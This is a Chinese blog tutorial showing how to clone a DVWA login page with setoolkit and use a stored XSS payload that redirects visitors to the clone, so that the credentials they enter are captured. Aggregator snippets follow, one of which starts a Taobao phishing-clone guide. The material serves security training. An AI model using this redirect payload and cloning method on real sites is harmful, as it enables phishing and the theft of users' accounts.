代码编织梦想

目录

一、盗取用户信息的原理

二、setookit工具克隆网站(万能社工工具)

三、利用存储型XSS漏洞跳转到该克隆网站

四、获取用户的账号与密码


一、盗取用户信息的原理

克隆网站登陆页面,利用XSS设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。

某网站有存储型XSS漏洞,我们利用该漏洞,使访问该网站的用户都跳转到克隆的登陆网页,用户如果安全意识不强,则会输入账号密码登陆,从而账号和密码被我们存储。

二、setookit工具克隆网站(万能社工工具)

以DVWA为例子

我们要克隆这个页面

注意 !这里要用 ip:端口号/dvwa 进入这个页面,我们一会需要在kali里面对这个页面进行克隆,需要从外部访问

kali终端输入setookit回车,y,回车

按顺序选择1--》2--》 3--》2 进入站点克隆

接下来不用输入,直接回车,默认使用kali的ip地址

输入需要克隆页面的url

http://172.20.10.3:8090/dvwa/login.php

然后回车

这就克隆好啦,我们直接访问172.20.10.5

可以看到我们克隆好的网页

三、利用存储型XSS漏洞跳转到该克隆网站

我们做好了克隆网站,下面就是要让受害者访问这个网站啦,就比如说,我在在线的dvwa中练习XSS呢,正好点进了有漏洞的页面,同时该网页被其他同学利用,已经存在存储好的脚本,我访问的时候触发跳转到让我登陆,如果我是初学者或者是在学其他模块不小心点错了,不知道这个漏洞,那我很可能会再输入一遍账号密码,从而泄露出去。

第一步构建payload

<script>document.location="http://172.20.10.5/";</script>

 我们把这一行插入到dvwa存储型XSS例题low难度

这时候我们再次访问

 直接跳转到我们做到克隆网页上了

做完这种操作以后无论在那个浏览器上访问,什么时候访问,都会跳转到该界面

尝试登陆

输入正确的账号密码,login一下发现没有任何效果,因为只克隆了这一页,当然不会有效果啦

四、获取用户的账号与密码

但是!这里没有效果,kali里面有啊,我们回到kali

账号密码就已经泄露被黑客拿到了

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127252363

360浏览器访问https网站直接跳转 se://error/ 或者se://errorpage/问题(无法打开网站,网页走丢了)解决方法-爱代码爱编程

最近发现360浏览器访问某个https://网站直接跳转 se://error/ 或者se://errorpage/具体如下 用其他浏览器,例如chrome就可以正常访问那个https网站。所以问题出在浏览器这块了。经过查询资料和测试发现,这个问题的正确解决办法有两个 1、如果安装了IE8等古老浏览器  可以在IE浏览器Internet设置里面,高级里

最近用360浏览器访问部分网站显示 se://error/ 打不开网站,但是用别的浏览器可以正常访问,摸索半天放出解决方法-爱代码爱编程

最近用360浏览器访问部分网站显示 se://error/ 打不开网站,但是用别的浏览器可以正常访问,摸索半天放出解决方法。 360浏览器访问带有个https://的网站,比如https://www.laopinpai.com,注意网址不是普通网站这种的http://www.laopinpai.com,是带有https://的。发现网站直接跳转 se:/

kali系统-爱代码爱编程

Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 Ka

se网站服务器,www.se8088.com服务器iP-爱代码爱编程

2021-07-23-----2021-08-10 101.32.211.103 2021-07-02-----2021-07-24 154.13.30.10 2021-06-30-----2021-07-23 154.13.30.8 2021-07-09-----2021-07-23 154.13.30.11 2021-05-16--

kali 克隆网站的制作(钓鱼网站)_kali beef克隆整个网站-爱代码爱编程

  本案例是淘宝的钓鱼网站  1输入命令:  setoolkit  2.         在多条命令选项中 找到      1) Social-Engineering Attacks   这条命令                            社会工程攻击               键盘输入1(输入相对应的序号)